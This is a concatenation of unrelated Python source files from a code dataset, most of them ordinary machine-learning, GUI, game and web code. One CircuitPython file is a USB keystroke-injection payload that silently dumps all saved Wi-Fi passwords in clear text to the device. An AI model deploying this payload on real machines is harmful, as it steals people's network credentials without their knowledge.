参数选择\n'''\nmodel_gbr=GradientBoostingRegressor()\nmodel_gbr.fit(train_x,train_y.ravel())\ngbr_score_disorder=model_gbr.score(test_x,test_y.ravel())\nprint('sklearn ensemble',gbr_score_disorder)\nprint('###############################参数网格优选###################################')\nmodel_gbr_GridSearch=GradientBoostingRegressor()\n#设置参数池 参考 http://www.cnblogs.com/DjangoBlog/p/6201663.html\nparam_grid = {'n_estimators':range(20,81,10),\n 'learning_rate': [0.2,0.1, 0.05, 0.02, 0.01 ],\n 'max_depth': [4, 6,8],\n 'min_samples_leaf': [3, 5, 9, 14],\n 'max_features': [0.8,0.5,0.3, 0.1]}\n#网格调参\nfrom sklearn.model_selection import GridSearchCV\nestimator = GridSearchCV(model_gbr_GridSearch,param_grid )\nestimator.fit(train_x,train_y.ravel() )\nprint('最优调参:',estimator.best_params_)\n# {'learning_rate': 0.1, 'max_depth': 4, 'max_features': 0.5, 'min_samples_leaf': 14, 'n_estimators': 30}\nprint('调参后得分',estimator.score(test_x, test_y.ravel()))\n'''\n\nmodel_mlp_best = MLPRegressor(hidden_layer_sizes=(3,26,28), activation='relu', solver='adam', alpha=0.0001, batch_size='auto',\n learning_rate='constant', learning_rate_init=0.001, power_t=0.5, max_iter=200, shuffle=True,\n random_state=1, tol=0.0001, verbose=False, warm_start=False, momentum=0.9, nesterovs_momentum=True,\n early_stopping=False,beta_1=0.9, beta_2=0.999, epsilon=1e-08)\nmodel_mlp_best.fit(train_x,train_y.ravel())\nmlp_score=model_mlp_best.score(test_x,test_y.ravel())\nprint('sklearn MLP',mlp_score) #准确率 0.713\n\nmodel_gbr_best=GradientBoostingRegressor(learning_rate=0.1,max_depth=4,max_features=0.5,min_samples_leaf=14,n_estimators=30)\nmodel_gbr_best.fit(train_x,train_y.ravel() )\ngbr_score=model_gbr_best.score(test_x,test_y.ravel())\nprint('sklearn ensemble',gbr_score)#准确率 0.702\n\n#使用最好的集成模型进行预测\ngbr_pridict=model_gbr_best.predict(test_x)\n#多层感知器\nmlp_pridict=model_mlp_best.predict(test_x)\n \n#画图\nimport matplotlib.pyplot as plt\nfig = plt.figure(figsize=(10, 5))\naxes = fig.add_subplot(1, 1, 1)\nline3,=axes.plot(range(len(test_y)), test_y, 'g',label='GroundTruth')\nline1,=axes.plot(range(len(gbr_pridict)), gbr_pridict, 'b--',label='Ensemble',linewidth=2)\nline2,=axes.plot(range(len(mlp_pridict)), mlp_pridict, 'r--',label='MLP',linewidth=2)\naxes.grid()\nfig.tight_layout()\nplt.legend(handles=[line1, line2, line3])\nplt.title(\"sklearn Regression\")\nplt.show()\n#print(ss_y.inverse_transform(mlp_pridict))\n","sub_path":"HW6/sk.py","file_name":"sk.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"88054909","text":"import sys\r\nimport math\r\nimport time \r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom gui import Ui_Form\r\n\r\ndef Factor(n):\r\n Ans = []\r\n d = 2\r\n while d * d <= n:\r\n if n % d == 0:\r\n Ans.append(d)\r\n n //= d\r\n else:\r\n d += 1\r\n if n > 1:\r\n Ans.append(n) \r\n return Ans \r\n\r\ndef main():\r\n #Create application\r\n app = QtWidgets.QApplication(sys.argv)\r\n\r\n #Create Form and UI\r\n Form = QtWidgets.QWidget()\r\n ui = Ui_Form()\r\n ui.setupUi(Form)\r\n Form.show()\r\n\r\n #Hook logic\r\n def bp():\r\n start_time = time.time()\r\n try :\r\n ui.label_7.setText(\"\") \r\n x=ui.lineEdit.text()\r\n n=Factor(int(x)) \r\n ui.textEdit.setText(str(n))\r\n ui.label_6.setText(str(time.time() - start_time))\r\n except :\r\n ui.label_7.setText(\"Дані введено не коректно\") \r\n\r\n \r\n \r\n\r\n ui.pushButton.clicked.connect( bp )\r\n \r\n\r\n\r\n #Run main loop\r\n sys.exit(app.exec_())\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\n\r\n\r\n","sub_path":"ferma/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"533602168","text":"import sys\nfrom time import sleep\nfrom bullet import Bullet\nimport pygame\n\ndef check_keydown_events(event, ai_settings, screen, stats, ship, bullets):\n \"\"\"Respond to keypress.\"\"\"\n if event.key == pygame.K_UP:\n ship.moving_up = True\n elif event.key == pygame.K_DOWN:\n ship.moving_down = True\n elif event.key == pygame.K_SPACE:\n fire_bullet(ai_settings, screen, ship, bullets)\n elif event.key == pygame.K_q:\n sys.exit()\n elif event.key == pygame.K_p:\n play_game(stats)\n\ndef check_keyup_events(event, ship):\n \"\"\"Respond to key releases.\"\"\"\n if event.key == pygame.K_UP:\n ship.moving_up = False\n elif event.key == pygame.K_DOWN:\n ship.moving_down = False\n\ndef check_events(ai_settings, screen, stats, play_button, ship,\n bullets):\n \"\"\"Respond to keypress and mouse events.\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ai_settings, screen, stats, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n check_play_button(ai_settings, screen, stats, play_button,\n ship, bullets, mouse_x, mouse_y)\n\ndef play_game(stats):\n \"\"\"Start a new game \"\"\"\n if not stats.game_active:\n pygame.mouse.set_visible(False)\n stats.reset_stats()\n stats.game_active = True\n\ndef check_play_button(ai_settings, screen, stats, play_button, ship,\n bullets, mouse_x, mouse_y):\n \"\"\"Start a new game when the player clicks Play.\"\"\"\n button_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)\n if button_clicked and not stats.game_active:\n ai_settings.initialize_dynamic_settings()\n pygame.mouse.set_visible(False)\n if play_button.rect.collidepoint(mouse_x, mouse_y):\n stats.reset_stats()\n stats.game_active = True\n\n # Empty the list of bullets.\n bullets.empty()\n\n # Center the ship\n ship.center_ship()\n\ndef update_screen(ai_settings, screen, stats, ship, bullets,\n play_button, target):\n \"\"\"Update images on the screen and flip to the new screen.\"\"\"\n # Redraw the screen during each pass through the loop.\n screen.fill(ai_settings.bg_color)\n\n # Redraw all bullets behind ship.\n for bullet in bullets.sprites():\n bullet.draw_bullet()\n\n ship.blitme()\n\n # Draw the play button if the game is inactive.\n if not stats.game_active:\n play_button.draw_button()\n\n # Draw the target\n target.draw_target()\n\n # Make the most recently drawn screen visible.\n pygame.display.flip()\n\ndef update_bullets(ai_settings, stats, screen, ship, target, bullets):\n \"\"\"Update position of bullets and get rid of old bullets.\"\"\"\n # Update bullet positions.\n bullets.update()\n\n # Get rif of bullets that have disappeared.\n for bullet in bullets.copy():\n if bullet.rect.left >= bullet.screen_rect.right:\n bullets.remove(bullet)\n if stats.ships_left > 0:\n stats.ships_left -= 1\n else:\n stats.game_active = False\n pygame.mouse.set_visible(True)\n\n check_bullet_target_collisions(ai_settings, screen, ship, target, bullets)\n\n\ndef check_bullet_target_collisions(ai_settings, screen, ship, target, bullets):\n # Respond to bullet-target collisions.\n bullet = pygame.sprite.spritecollideany(target, bullets)\n if bullet:\n # Destroy existing bullet.\n bullets.remove(bullet)\n ai_settings.increase_speed()\n\ndef fire_bullet(ai_settings, screen, ship, bullets):\n \"\"\"Fire a bullet if limit not reached yet.\"\"\"\n # Create a new bullet and add it to the bullets group.\n if len(bullets) < ai_settings.bullets_allowed:\n new_bullet = Bullet(ai_settings, screen, ship)\n bullets.add(new_bullet)\n\ndef update_target(ai_settings, stats, screen, ship, target, bullets):\n \"\"\"Check if the target is at an edge and then update its positions.\"\"\"\n if target.check_edges():\n ai_settings.target_direction *= -1\n target.update()\n","sub_path":"alien/exercises/Target/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"520027006","text":"#!/usr/bin/env python\n\n##################################################\n## Universidade Federal da Bahia\n## 2018.2 - MATE21\n##################################################\n## GPLv3\n##################################################\n## Author: Adeilson Silva\n## Mmaintainer: github.com/adeilsonsilva\n## Email: adeilson@protonmail.com\n##################################################\n\nimport cv2\nimport json\nimport numpy as np\nimport os\nimport random\n\n# https://gluon.mxnet.io/chapter02_supervised-learning/softmax-regression-scratch.html\nN_CLASS = 10\n\n# Max number of epochs to run\nMAX_EPOCHS = 50\n\n# Image dimensions\nIMG_WIDTH = 71\nIMG_HEIGHT = 77\nNUM_CHANNELS = 1\n\n# There are 5000 training images\nDATA_SIZE = 5000\n\n# Learning rate\nL_RATE = 1e-1\n\n# Stop training if loss variates less than this\nMAX_DLOSS = 1e-7\nMIN_STD = 1e-3\n\n# Batch gradient descent parameter\n# https://towardsdatascience.com/gradient-descent-algorithm-and-its-variants-10f652806a3\nBATCH_SIZE = 64\n\ndef save_model(model, model_path):\n json_result = json.dumps(model)\n f = open(model_path,\"w\")\n f.write(json_result)\n f.close()\n\ndef load_model(model_path):\n f = open(model_path,\"r\")\n json_result = json.loads(''.join(f.readlines()))\n f.close()\n return json_result\n\n# Generate a random number and apply the change\ndef augmentate(image):\n\n # Rotates by an angle of [1, 10]\n if (random.random() >= 0.5):\n angle = random.randint(1, 10)\n image_center = tuple(np.array(image.shape[1::-1]) / 2)\n rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)\n image = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\n\n # Translates by [1, 10] pixels\n if (random.random() >= 0.5):\n tx = random.randint(1, 10)\n ty = random.randint(1, 10)\n transl_mat = np.float32([ [1, 0, tx], [0, 1, ty] ])\n image = cv2.warpAffine(image, transl_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\n\n # Flips horizontally\n # if (random.random() >= 0.5):\n # cv2.flip(image, 1, image)\n\n # Gaussian noise\n # if (random.random() >= 0.5):\n # noise = image.copy()\n # cv2.randn(noise, (0), (150))\n # image += noise\n\n # Uniform noise\n if (random.random() >= 0.5):\n noise = image.copy()\n cv2.randu(noise, (0), (5))\n image += noise\n\n # print(image.shape)\n # cv2.imshow('teste', image)\n # cv2.waitKey(5000)\n return image\n\n# This function receives a list of image paths, loads them with OpenCV\n# and return an array with images and their labels\ndef load_batch(batch, as_vector=False, augmentation=False):\n images = []\n labels = []\n for tuple in batch:\n image_path = tuple[0]\n label = tuple[1]\n image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\n if augmentation:\n # Stochastic augmentation\n image = augmentate(image)\n if as_vector:\n # Reshapes image to a 1D vector and normalizes all pixels to [0, 1]\n image = image.reshape(IMG_WIDTH*IMG_HEIGHT*NUM_CHANNELS) / 255.0\n else:\n image = image.reshape(IMG_HEIGHT, IMG_WIDTH, NUM_CHANNELS) / 255.0\n images.append(image)\n labels.append(label)\n return np.array(images), np.array(labels)\n\ndef load_training_images(path, validation_percentage, as_vector = True, return_paths = False):\n # Load all file paths\n\n # Get class labels for training\n # Filters out blank values, removes \"\\n\", splits by \"/\" and get last position of strip.\n class_names = [ list(filter(None, i.rstrip().rsplit(\"/\")))[-1] for i in os.popen(\"ls -1d {}/train/*/\".format(path)).readlines() ]\n\n # 3D Arrays -> each position is an array with an image (which is an array) and a label\n # training_images[i][0] -> image\n # training_images[i][1] -> label\n training_images = []\n validation_images = []\n\n # Get images for each class and split into training and validation\n images_counter = 0\n for idx in range(0, len(class_names)):\n # Get all\n class_images = [ i.rstrip() for i in os.popen(\"ls {}train/{}/* | sort -V\".format(path, class_names[idx])).readlines() ]\n # Shuffle list to get different images each time\n random.shuffle(class_images)\n class_images_len = len(class_images)\n images_counter += class_images_len\n\n # Split into training and validation based on idx\n validation_idx = int(np.floor(class_images_len * validation_percentage))\n\n # Get splits paths\n training_paths = class_images[:class_images_len - validation_idx]\n validation_paths = class_images[class_images_len - validation_idx:]\n\n # Load training images\n for image_path in training_paths:\n if return_paths:\n image = image_path\n else:\n image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\n if as_vector:\n # Reshapes image to a 1D vector and normalizes all pixels to [0, 1]\n image = image.reshape(IMG_WIDTH*IMG_HEIGHT*NUM_CHANNELS) / 255.0\n else:\n image = image.reshape(IMG_HEIGHT, IMG_WIDTH, NUM_CHANNELS) / 255.0\n training_images.append([ image, idx ])\n\n # Load validation images\n for image_path in validation_paths:\n if return_paths:\n image = image_path\n else:\n image = cv2.imread(image_path, cv2.IMREAD_GRAYSCALE)\n if as_vector:\n # Reshapes image to a 1D vector and normalizes all pixels to [0, 1]\n image = image.reshape(IMG_WIDTH*IMG_HEIGHT*NUM_CHANNELS) / 255.0\n else:\n image = image.reshape(IMG_HEIGHT, IMG_WIDTH, NUM_CHANNELS) / 255.0\n validation_images.append([ image, idx ])\n\n return np.array(training_images), np.array(validation_images)\n","sub_path":"trab04/common_data.py","file_name":"common_data.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"376005641","text":"import matplotlib\nmatplotlib.use('agg')\nfrom matplotlib import pyplot as plt # 2d plots\nfrom mpl_toolkits.mplot3d import Axes3D # 3dplots\nimport numpy as np # matrices and numerical methods\n\ndata = np.loadtxt('ex1data2.txt', delimiter=',')\nX = np.c_[data[:,0:2]]\ny = np.c_[data[:,2]]\n\n# this is a vectorized implementation, also works for multivarite\ndef computeCost(X, y, theta):\n m = X.shape[0] # number of examples\n\n predictions = X.dot(theta)\n errors = predictions - y\n sq_errors = np.square(errors)\n sum_of_sq_errors = np.sum(sq_errors)\n\n return (1/(2*m)) * sum_of_sq_errors\n\n# note: we return the mean and standard deviation so we can normalize\n# new test data we want to predict.\ndef normalizeFeatures(X):\n mu = np.mean(X, axis=0)\n sigma = np.std(X, axis=0)\n\n X_norm = X - mu\n X_norm = X_norm / sigma\n\n return (X_norm, mu, sigma)\n\nX, mu, sigma = normalizeFeatures(X)\nX = np.insert(X, 0, 1, axis=1) # add intercept term\n\ntheta = [[0],[0], [0]] # the parameters for our hypothesis\nalpha = 0.05 # our learning rate for gradient descent\niterations = 1500 # how many iterations we're running gradient descent\n\n# this is a vectorized implementation, also works for multivariate\ndef gradientDescent(X, y, theta, alpha, iterations):\n m = np.size(X, 0)\n J_hist = np.zeros(iterations)\n\n for i in np.arange(iterations):\n predictions = X.dot(theta)\n errors = predictions - y\n\n par_deriv = (1/m) * (X.T.dot(errors))\n theta = theta - alpha * par_deriv\n\n J_hist[i] = computeCost(X, y, theta)\n\n return (theta, J_hist)\n\ntheta, cost = gradientDescent(X, y, theta, alpha, iterations)\nprint('theta: ', theta.ravel())\n\nplt.plot(cost)\nplt.xlim(0, 80)\nplt.ylabel('Cost')\nplt.xlabel('Iterations');\nplt.savefig('01_gradient_descent_cost.png')\nplt.close()\n\n# when we add a new data point we want to predict, we need to\n# normalize it first, before adding the intercept term\nnew_data = [1650, 3]\nnew_data = new_data - mu\nnew_data = new_data / sigma\n\n# add intercept term\nnew_data = np.insert(new_data, 0, 1)\n\nprice = theta.T.dot(new_data)\n\nprint('Predicted price of a 1650 sq-ft, 3 br. house (using gradient descent): $%f' % price);\n","sub_path":"coursera-ml/python/01-linear-regression/multivariate/01-linear-regression-multivariate.py","file_name":"01-linear-regression-multivariate.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"565188248","text":"# ez_tweet.py - by baldnate\n#\n# When you just want to update twitter status and nothing else, ez_tweet is there.\n\nfrom twython import Twython, TwythonError, TwythonAuthError, TwythonStreamError, TwythonRateLimitError\n\n\nclass EZTweet(object):\n\n \"\"\"docstring for EZTweet\"\"\"\n\n def __init__(self, appkey, appsecret, oauthtoken, oauthtokensecret):\n super(EZTweet, self).__init__()\n self.twitter = Twython(appkey, appsecret, oauthtoken, oauthtokensecret)\n self.lastTweet = \"\"\n\n def __what_to_do__(self, e):\n \"\"\"\n Internal function for figuring out what to do with a Twython exception\n \"\"\"\n if e is TwythonAuthError:\n raise e\n elif e is TwythonStreamError:\n raise e\n elif e is TwythonRateLimitError:\n return e.retry_after\n elif e.error_code in [502, 503, 504]:\n return 1 * 60\n elif e.error_code in [403]:\n return 5 * 60\n else:\n raise e\n\n def tweet(self, status):\n \"\"\"\n Returns number of seconds to wait until next tweet.\n Raises if a non-retryable offense occurs.\n \"\"\"\n retVal = -1\n if status == self.lastTweet:\n # Errors get returned for posting the same status\n # in succession. Don't tweet, and request tweet\n # retry back-off of 60 seconds.\n return 60\n try:\n self.twitter.update_status(status=status)\n except TwythonError as e:\n retVal = self.__what_to_do__(e)\n self.lastTweet = status\n return retVal\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"host/ez_tweet.py","file_name":"ez_tweet.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"537247633","text":"\"\"\"Script test runner.\"\"\"\nimport logging\nimport sys\nimport subprocess\nfrom subprocess import CalledProcessError\nfrom typing import Dict, Any # pylint: disable=unused-import\n\nfrom runway.tests.handlers.base import TestHandler\n\nTYPE_NAME = 'script'\nLOGGER = logging.getLogger('runway')\n\n\nclass ScriptHandler(TestHandler):\n \"\"\"Handle script tests.\n\n Args:\n commands (List[str]): A list of commands to be executed in order.\n Each command is run in its own subprocess. The working directory\n will be the same as where the 'runway test' command was executed.\n\n Example:\n tests:\n - name: example-test\n type: script\n args:\n commands:\n - echo \"this is an example\"\n - pwd\n\n \"\"\"\n\n @classmethod\n def handle(cls, name, args):\n # type: (str, Dict[str, Any]) -> None\n \"\"\"Perform the actual test.\"\"\"\n for cmd in args['commands']:\n try:\n exit_code = subprocess.call(cmd, shell=True)\n if exit_code != 0:\n raise ValueError(exit_code)\n except CalledProcessError as err:\n LOGGER.error('%s: failed to execute command: %s',\n name, cmd)\n raise err\n except ValueError:\n LOGGER.error('%s: failed command: %s', name, cmd)\n sys.exit(1)\n","sub_path":"runway/tests/handlers/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"410683020","text":"import sys\nimport pymongo\n\nconnection = pymongo.MongoClient(\"mongodb://localhost\")\n\ndb = connection.python\n\nsample = db.sample\n\ndoc = {'col01': 1, 'col02': 1,'col03':1}\n\nrow = db.sample.delete_many({\"col01\" : 2})\n# db.people.updateMany({age:{$gt:25}},{$set:{status:\"C\"}})\n\nrows = db.sample.find()\n\nfor r in rows :\n print(r)","sub_path":"HELLOPYTHON/day10/mongo_delete.py","file_name":"mongo_delete.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"482711723","text":"# Author: Brian Hoang\n# Date: 10/23/2019\n# Description: function that returns # of steps to reach 1 in hailstone sequence when starting at n\n\ndef hailstone(n):\n #count variable is increased everytime loop is ran\n count=0\n #runs loop until n=1\n while n!=1:\n #if number is even, divide by 2\n if(n%2) == 0:\n n=n/2\n count+=1\n #if number is odd, multiply by 3 and add 1\n else:\n n=n*3+1\n count+=1\n #return number it takes to get to 1\n return count\nprint(int(hailstone(3)))\n\n","sub_path":"hailstone.py","file_name":"hailstone.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"385637400","text":"from flask import session\nfrom datetime import datetime\nfrom models.user import User\n\ndef prep_landing():\n user = User.query.get(session['user_id'])\n tweets = []\n u_f = user.users_this_user_is_following\n for u in u_f:\n tweets.extend(u.user_tweets)\n tweets.extend(user.user_tweets)\n liked_tweets = user.tweets_this_user_likes\n return user, tweets, liked_tweets\n\ndef tweet_time(tweets):\n for tweet in tweets:\n td = datetime.utcnow() - tweet.created_at\n if td.seconds == 0:\n tweet.time_since_secs = 1\n if td.seconds < 60 and td.seconds > 0:\n tweet.time_since_secs = td.seconds\n if td.seconds < 3600:\n tweet.time_since_minutes = round(td.seconds / 60) % 60\n if td.seconds > 3600:\n tweet.time_since_hours = round(td.seconds / 3600)\n if td.days > 0:\n tweet.time_since_days = td.days\n\n return tweets\n\ndef tweet_like_count(tweets):\n for tweet in tweets:\n tweet.like_count = len(tweet.users_who_like_this_tweet)\n \n return tweets","sub_path":"modularization/dojo_tweets_mod/landing_utils.py","file_name":"landing_utils.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"307491679","text":"# Tech Notebook\n# youtube.com/technotebook\nimport time\nimport os\nimport usb_hid\nfrom adafruit_hid.keycode import Keycode\nfrom adafruit_hid.keyboard import Keyboard\nfrom adafruit_hid.keyboard_layout_us import KeyboardLayoutUS\n\ntime.sleep(3)\n\nif not 'network.txt' in os.listdir():\n time.sleep(1.5)\n keyboard = Keyboard(usb_hid.devices)\n layout = KeyboardLayoutUS(keyboard)\n\n keyboard.send(Keycode.WINDOWS, Keycode.R)\n time.sleep(0.11)\n\n layout.write(\"cmd\\n\")\n\n time.sleep(0.17)\n\n layout.write(\"e:\\n\")\n time.sleep(0.05)\n\n layout.write(\"netsh wlan show profile * key=clear > network.txt\\n\")\n\n time.sleep(0.6)\n\n keyboard.send(Keycode.ALT, Keycode.F4)\n","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"331565815","text":"import os, sys,inspect, thread, time\nsys.path += [\"/usr/lib/Leap\", \"../lib/x64\", \"../lib\"]\nimport Leap\nfrom Leap import CircleGesture, KeyTapGesture, ScreenTapGesture, SwipeGesture\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom Leap import *;\n\nclass LeapListener(Leap.Listener):\n\n def on_init(self,controller):\n print(\"inited\");\n\n def on_connect(self,controller):\n controller.enable_gesture(Leap.Gesture.TYPE_CIRCLE);\n controller.enable_gesture(Leap.Gesture.TYPE_SWIPE);\n\n def on_exit(self,controller):\n print(\"exited\");\n\n def on_disconnect(self,controller):\n print(\"disconnect\");\n\n def on_frame(self, controller):\n print(\"on frame\")\n frame = controller.frame();\n global hands \n hands = frame.hands\n \nlistener = LeapListener();\n\ncontroller = Leap.Controller();\n\ncontroller.add_listener(listener)\n\ndef drawInit():\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n glViewport(0,0,640,480)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(-550,550,-550,550,-300,300)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\ndef arm_pos_gen(hand):\n yield hand.arm.wrist_position\n yield hand.arm.elbow_position\n\ndef drawSphere(radius,pos):\n glPushMatrix()\n OpenGL.GL.glTranslate(pos.x,pos.y,pos.z)\n color = [1.,0.,1.]\n glMaterialfv(GL_FRONT,GL_DIFFUSE,color)\n glutSolidSphere(radius,550,550)\n glPopMatrix()\n\ndef draw():\n drawInit()\n glColor3f(1,0,0)\n for hand in hands:\n for pos in arm_pos_gen(hand):\n drawSphere(20,pos)\n for finger in hand.fingers:\n for b in range(0,4):\n pos = finger.bone(b).center\n drawSphere(10,pos)\n glutSwapBuffers()\n\ndef main1():\n glutInit();\n glutInitDisplayMode(GLUT_DOUBLE|GLUT_ALPHA|GLUT_DEPTH)\n glutInitWindowSize(640,480)\n glutInitWindowPosition(0,0)\n windows = glutCreateWindow(\"testWindow\")\n glClearColor(0.,0.,0.,1.)\n glShadeModel(GL_SMOOTH)\n glEnable(GL_CULL_FACE)\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_LIGHTING);\n glEnable(GL_LIGHT0);\n\n ambientLight = [ 0.2, 0.2, 0.2, 1.0 ];\n diffuseLight = [ 0.8, 0., 0., 1.0 ] \n specularLight = [ 1.0, 0, 0, 1.0 ]\n position =[ -0, 1.0,400.0, 1.0 ]\n\n glLightfv(GL_LIGHT0, GL_AMBIENT, ambientLight);\n glLightfv(GL_LIGHT0, GL_DIFFUSE, diffuseLight);\n glLightfv(GL_LIGHT0, GL_SPECULAR, specularLight);\n glLightfv(GL_LIGHT0, GL_POSITION, position);\n glutDisplayFunc(draw)\n glutIdleFunc(draw)\n glutMainLoop()\n\nif __name__ == \"__main__\":\n main()\n controller.remove_listener(listener);\n","sub_path":"leap.py","file_name":"leap.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"417778265","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom tensorflow.keras import callbacks\nfrom tensorflow.keras.optimizers import schedules\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.losses import sparse_categorical_crossentropy\nfrom tensorflow.keras.optimizers import Adam\nfrom sklearn.model_selection import KFold\nfrom os import listdir\nimport json\nfrom os import path as ospath\n\n# a simple custom activation\ndef mapping_to_target_range(x, target_min=0, target_max=500):\n from tensorflow.keras import backend as BK\n x02 = BK.tanh(x)+1 # x in range(0,2)\n scale = (target_max-target_min)/2.\n return x02*scale+target_min\n\ndef graph(histories, tight_layout=False, holdoutscores=None):\n fig, axs = plt.subplots(nrows=1, ncols=len(histories), figsize=(20, 5))\n n = 0\n for ax, kmodel in zip(axs, histories.items()):\n epochs = range(1, kmodel[1].params['epochs']+1)\n ax.plot(epochs, kmodel[1].history['loss'])\n ax.plot(epochs, kmodel[1].history['val_loss'])\n if holdoutscores!=None: ax.axhline(y=holdoutscores[n], color='r', linestyle='-')\n ax.set_yscale('log')\n ax.set_ylabel('loss')\n ax.set_xlabel('epochs')\n ax.legend(['loss', 'val_loss', 'holdoutscore'], loc='upper left')\n if holdoutscores!=None: ax.set_title(f'{kmodel[0]} model loss, holdout: {round(holdoutscores[n], 2)}')\n else: ax.set_title(f'{kmodel[0]} model loss')\n n += 1\n if tight_layout==True: plt.tight_layout()\n plt.show()\n\ndef get_callbacks():\n return [callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=100, min_lr=0.0001, verbose=1),\n callbacks.EarlyStopping(monitor='val_loss', min_delta=0, patience=1000, verbose=0, mode='auto', baseline=None, restore_best_weights=False)]\n\ndef model_duilder_kfold(xdim, ydim, model='v1', num_folds=5, loss_function='mean_squared_error',\n optimizer='adam', reshuffle=False):\n # define the model architecture\n for k in range(0, num_folds):\n #shallow model\n if model == 'v1':\n model = Sequential()\n model.add(Dense(270, activation='relu', input_dim=xdim))\n model.add(Dropout(0.2))\n model.add(Dense(135, activation='relu'))\n model.add(Dropout(0.1))\n #model.add(Dense(1, activation=mapping_to_target_range))\n #model.add(Lambda(lambda x: x * [2]))\n model.add(Dense(ydim))\n \n # deep model\n elif model == 'v2':\n model = Sequential([\n Dense(2048, kernel_regularizer=regularizers.l2(0.001),\n activation='relu', input_dim=xdim),\n Dropout(0.2),\n Dense(1024, kernel_regularizer=regularizers.l2(0.001),\n activation='relu'),\n Dropout(0.1),\n Dense(512, kernel_regularizer=regularizers.l2(0.001),\n activation='relu'),\n Dropout(0.01),\n Dense(ydim)])\n model.compile(loss = loss_function, optimizer = optimizer)\n # save model\n path = '_Kfolds_models'\n model.save(f'./{path}/k{k+1}_model.h5')\n return path\n\ndef model_saver_kfold(models):\n # load saved model from file\n val = input(\"Saver trained models (y/n): \")\n if val.startswith(('Y', 'y')):\n for model_name, model in models.items():\n # save model\n model.save(f'./_Kfolds_models/{model_name}.h5')\n\ndef model_loader_kfold(path=None, ext=False):\n try:\n models = {}\n for filename in listdir(path):\n if ext==False: name = filename.rpartition('.')[0].replace(' ', '_')\n else: name =filename.replace(' ', '_')\n if filename.endswith('.h5'):\n models[name] = load_model(path+'\\\\'+filename)\n return models\n except:\n print ('No models loaded for \\\\',path)\n\ndef model_kfold(x, y, holdout=None, model='v1', num_folds=5, batch_size=None, steps_per_epoch=20, loss_function='mean_squared_error', optimizer='adam', max_epochs=100, verbosity=1, workers=6,\n use_multiprocessing=True, continue_training=False, save_models_afte_training=True, plot_results=True, reshuffle=False, random_state=42, path=None):\n # setting local variables\n if 'histories' not in locals(): histories = {}\n #setting up working directory\n if path==None: path = '_Kfolds_models'\n\n # define the K-fold Cross Validator\n kfold = KFold(n_splits=num_folds, random_state=random_state, shuffle=True)\n\n # storing ksets\n ksets = {}\n count = 1\n for test, train in kfold.split(x):\n ksets['k{}'.format(count)] = {}\n ksets['k{}'.format(count)]['train'] = train.tolist()\n ksets['k{}'.format(count)]['test'] = test.tolist()\n count += 1\n print(len(ksets) == num_folds)#assert we have the same number of splits\n #dump ksets to json\n \n\n #loading previous ksets oder\n if ospath.exists(f'./{path}/ksets.json')==True and reshuffle==False:\n with open(f'./{path}/ksets.json') as f: ksets = json.load(f)\n\n # create fesh modelsn\n if continue_training==False:\n path = model_duilder_kfold(x.shape[1], len(y.shape), model=model, num_folds=num_folds, loss_function=loss_function,\n optimizer=optimizer)\n if reshuffle==False:\n with open(f'./{path}/ksets.json', 'w') as fp: json.dump(ksets, fp)\n\n #load models\n models = model_loader_kfold(path=path, ext=False)\n\n # K-fold Cross Validation model evaluation\n fold_no = 1\n holdoutscores =[]\n for k, kset in ksets.items():\n model_key = str(f'{k}_model')\n train = kset['train']\n test = 